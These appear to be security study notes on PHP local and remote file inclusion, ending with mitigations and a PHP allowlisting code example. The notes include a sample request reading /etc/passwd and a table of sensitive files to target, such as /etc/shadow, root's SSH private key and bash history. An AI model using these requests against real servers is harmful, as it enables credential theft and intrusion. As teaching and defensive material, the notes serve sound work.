File Inclusion
The main issue with these vulnerabilities is input validation: user inputs are not sanitized or validated, and the user controls them
When input is not validated, the user can pass any input to the function, causing a vulnerability
Can be used to read sensitive data
If you can write to places like the /tmp directory, you can gain RCE
Allows attackers to read OS resources, such as local files on the server running an application
Exploited by manipulating and abusing the web application's URL to locate and access files or directories stored outside the app's root directory
Happens when a user's input is passed to a function like file_get_contents in PHP to read the content of a file
| Location | Description |
| --- | --- |
| /etc/issue | contains a message or system identification to be printed before the login attempt |
| /etc/profile | controls system-wide default variables (export variables, file creation mask, etc.) |
| /proc/version | specifies the version of the Linux kernel |
| /etc/passwd | lists all registered users that have access to a system |
| /etc/shadow | contains information about the system's users' passwords |
| /root/.bash_history | contains the command history for the root user |
| /var/log/dmessage | contains global system messages, including messages that are logged during system startup |
| /var/mail/root | all emails for the root user |
| /root/.ssh/id_rsa | private SSH keys for root or any known valid user on the server |
| /var/log/apache2/access.log | the accessed requests for the Apache web server |
| C:\boot.ini | contains the boot options for computers with BIOS firmware |
Examples
http://TARGET_URL/index.php?file=/etc/passwd
Technique to include remote files into a vulnerable application
One requirement for RFI is that the allow_url_fopen option needs to be on
Allows an attacker to gain RCE on the server and can lead to:
Sensitive Information Disclosure
Cross-site Scripting (XSS)
DoS
Creates a reverse shell file
Keep system and services, including web application frameworks, updated with the latest version
Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information
A WAF is a good option to help mitigate web application hacks
Disable PHP features that cause file inclusion vulnerabilities if your web app doesn't need them (allow_url_fopen and allow_url_include)
Carefully analyze the web application and allow only the protocols and PHP wrappers that are needed
Never trust user input, and make sure to implement proper input validation against file inclusion
Implement whitelisting for file names and locations as well as blacklisting
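
The input validation and file name/location allowlisting described above, shown as an added example that is not part of the original notes. The function name resolve_page, the PAGES map and the pages/ directory are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example, not from the original notes. All names here are hypothetical.

// Allowlist: the only values the "file" parameter may take, mapped to fixed files.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page name to a file inside $baseDir.
 * Returns the absolute path, or null if the request must be rejected.
 */
function resolve_page(string $name, string $baseDir): ?string
{
    // 1. File-name allowlist: values such as "/etc/passwd", "../../x",
    //    "http://..." or "php://..." are not keys, so they never reach disk.
    if (!array_key_exists($name, PAGES)) {
        return null;
    }
    // 2. Location allowlist: canonicalise both paths (resolves ".." and
    //    symlinks) and require the result to stay under the base directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$name]);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the allowed location
    }
    return $path;
}

// Vulnerable pattern from the notes, for comparison:
//     echo file_get_contents($_GET['file']);
// Hardened index.php: the parameter only selects an allowlisted page.
$raw  = $_GET['file'] ?? 'home';
$page = is_string($raw) ? resolve_page($raw, __DIR__ . '/pages') : null;
if ($page === null) {
    http_response_code(404); // generic response, no path or error detail leaked
    exit('Not found');
}
include $page;
```

With this in place, a request like the index.php?file=/etc/passwd example above gets the 404 response because the value is not an allowlisted key.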